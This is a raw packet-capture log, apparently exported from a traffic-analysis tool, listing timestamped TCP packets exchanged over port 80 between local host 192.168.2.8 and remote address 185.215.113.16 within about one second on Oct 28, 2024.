                                                                                                    Oct 28, 2024 07:18:44.865045071 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.865051031 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.865087986 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.865103006 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.865107059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.865190029 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.866110086 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.866144896 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.866161108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.866183043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.866343975 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.866343975 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.866343975 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.866343975 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117170095 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117185116 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117202044 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117213011 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117229939 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117240906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117250919 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117264032 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117275953 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117295980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117314100 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117326021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117336988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117348909 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117358923 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117369890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117368937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117368937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117368937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117368937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117368937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117369890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117369890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117369890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117384911 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117397070 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117397070 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117402077 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117407084 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117414951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117424965 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117436886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117438078 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117438078 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117438078 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117449045 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117449045 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117461920 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117471933 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117484093 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117495060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117527008 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117532015 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117532015 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117537975 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117553949 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117566109 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117568970 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117578030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117588997 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117600918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117609978 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117609978 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117613077 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117625952 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117638111 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117651939 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117651939 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117707968 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117774010 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117777109 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117810011 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117822886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117866039 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117872000 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117877960 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117891073 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.117923021 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.117973089 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.118714094 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.118742943 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.118755102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.118840933 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.118854046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.118865013 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.118877888 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.118901968 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.118913889 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.347739935 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.347759008 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.347769976 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.347881079 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.347939968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.347959042 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.347978115 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.347989082 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348006010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348017931 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348028898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348042011 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348052979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348063946 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348077059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348081112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348081112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348081112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348081112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348088980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348100901 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348105907 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348112106 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348123074 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348134995 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348148108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348159075 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348169088 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348169088 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348176956 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348187923 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348197937 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348210096 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348222971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348227024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348237991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348249912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348262072 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348274946 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348279953 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348279953 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348287106 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348298073 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348309994 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348311901 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348321915 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348334074 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348345041 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348347902 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348356962 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348367929 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348376036 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348380089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348392010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348400116 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348402977 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348416090 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348421097 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348427057 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348438978 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.348454952 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348454952 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.348495007 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.661737919 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662461996 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662545919 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.662583113 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662595987 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662607908 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662620068 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662632942 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662646055 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.662754059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.662754059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.662754059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.663206100 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.663218021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.663230896 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.663243055 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.663258076 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.663269043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.663276911 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.663276911 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.663333893 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.664025068 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.664077044 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.664088964 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.664119005 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.664129019 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.664139986 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.664159060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.664159060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.664190054 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.664990902 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665056944 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665067911 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665083885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665101051 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665112019 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665127039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.665147066 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.665261030 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.665836096 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665913105 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665924072 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665935993 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665946007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665956974 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.665976048 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.666017056 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.666017056 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.666781902 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.666793108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.666802883 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.666835070 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.666845083 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.666857004 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.666870117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.666897058 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.666922092 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.667776108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.667788029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.667799950 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.667812109 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.667824030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.667836905 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.667838097 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.667865992 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.667880058 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.668637991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.668657064 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.668715000 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.668720007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.668731928 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.668742895 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.668755054 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.668785095 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.668833017 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.669580936 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.669622898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.669635057 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.669647932 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.669745922 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.669745922 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.670197010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670216084 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670270920 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.670486927 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670545101 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670556068 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670567036 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670578003 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670588970 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.670636892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.670636892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.670636892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.671355009 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.671391010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.671433926 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.671444893 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.671471119 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.671494007 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.672066927 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672079086 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672090054 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672101974 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672113895 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672125101 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672130108 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.672142029 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.672173977 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.672364950 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.672934055 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672972918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672986984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.672997952 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673028946 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.673028946 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.673569918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673582077 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673593044 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673604012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673616886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673633099 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.673656940 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.673656940 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.673685074 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.674431086 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.674469948 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.674482107 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.674500942 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.674513102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.674536943 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.674536943 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.675251007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.675261974 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.675272942 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.675282955 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.675295115 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.675307035 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.675334930 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.675334930 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.675350904 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.676107883 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676186085 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.676275015 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676286936 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676297903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676326036 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.676331997 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676343918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676354885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.676382065 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.676420927 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.677234888 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.677247047 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.677257061 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.677272081 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.677283049 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.677284002 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.677294016 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.677316904 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.677371025 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:45.678714037 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.678725958 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.678736925 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:45.678749084 CET8049717185.215.113.16192.168.2.8
